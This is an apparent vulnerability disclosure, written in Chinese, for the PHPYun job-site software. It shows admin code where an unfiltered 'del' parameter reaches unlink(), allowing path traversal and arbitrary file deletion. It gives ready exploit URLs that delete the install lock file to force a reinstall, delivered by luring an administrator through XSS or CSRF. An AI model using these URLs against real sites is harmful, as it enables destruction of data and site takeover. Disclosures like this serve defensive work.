### 简要描述:
RT
### 详细说明:
/admin/model/com_member.class.php,279行开始:
```
function del_action()
{
if($_GET["delsub"]){
$del=$_GET["del"];
if($del){
if(@is_array($del)){
$uids = @implode(",",$del);
foreach($del as $k=>$v){
$this->obj->delfiledir("..https://images.seebug.org/upload/tel/".$v);
```
$_GET["del"]没有做任何过滤,进入delfiledir()前,$v没有过滤
/model/class/action.class.php,709行开始:
```
function delfiledir($delfiles){
if(is_file($delfiles)){
@unlink($delfiles);
```
$delfiles进入unlink()前未过滤
可利用../等跨目录删除任意文件,如:删除install.lock后可进行重装
```
http://localhost/phpyun/admin/index.php?M=com_member&C=del&delsub=1&del[]=../../data/phpyun.lock
```
需要结合XSS/CSRF,让管理员点击触发。
### 漏洞证明:
```
http://localhost/phpyun/admin/index.php?M=com_member&C=del&delsub=1&del[]=../../data/phpyun.lock
```
结合XSS,CSRF等让管理员触发,删除install.lock,导致重装
exp:
```
http://localhost/phpyun/admin/index.php?M=com_member&C=del&delsub=1&del[]=../../[任意文件路径]
```
京公网安备 11010502034610号
暂无评论